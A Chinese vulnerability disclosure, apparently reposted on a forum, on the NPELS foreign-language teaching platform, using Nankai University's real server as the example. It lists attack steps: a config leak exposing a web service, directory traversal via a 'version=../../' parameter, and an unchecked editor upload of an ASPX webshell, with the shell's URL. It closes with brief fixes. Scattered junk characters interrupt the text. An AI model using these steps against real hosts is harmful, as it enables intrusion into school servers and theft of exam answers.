新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中
! j9 B! H; `: e9 {5 h1 _
详细说明：

9 I6 a. s& \8 ]+ D3 V( d以南开大学的为例:
http://222.30.60.3/NPELS
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
2 ~; J; g1 d- y) e& F  `  c<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
$ z7 b- Z; e9 ?/ U, w! h  g6 L</setting>
及版本号
- {+ Z6 U. k# ~1 p. ^  ^<add key="TVersion" value="1, 0, 0, 2187">
; G4 u0 g) F# B5 x</add>
6 B5 F) w/ ^* v) p直接访问
http://222.30.60.3/NPELS/CommonService.asmx
使用GetTestClientFileList操作，直接 HTTP GET 列目录：
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
) k: ^4 v$ j7 h: ~4 }# ~( G/ xhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
- v% a9 b/ o& Z
发现
7 c$ V+ g9 l: bhttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
5 P. |* o4 n$ ], U, o9 D' ]上传后继续列目录找到木马地址直接访问即可

) T+ D% @$ N% z& _' _) ?- pOOXX
0 E$ |% V% M8 t2 N0 H7 X. q( u
Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
2 K+ @! X9 y- c! e, P漏洞证明：
% v( P% m& v0 U/ w0 l
列目录：
! j! w' X& m% b1 [http://222.30.60.3/NPELS/CommonS ... List?version=../../
文件上传：
http://222.30.60.3/npelsv/editor/editor.htm

上传木马：
0 }% z9 e; n1 F! O. }http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx

" K9 x1 X# I' T& w! X* T4 K修复方案：
好像考试系统必须使用 CommonService.asmx
3 o  V0 [  r% [# y2 X! N最好配置文件加密或者用别的方式不让它泄露出来
  u' Y" j. u. Q, b& X0 e并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​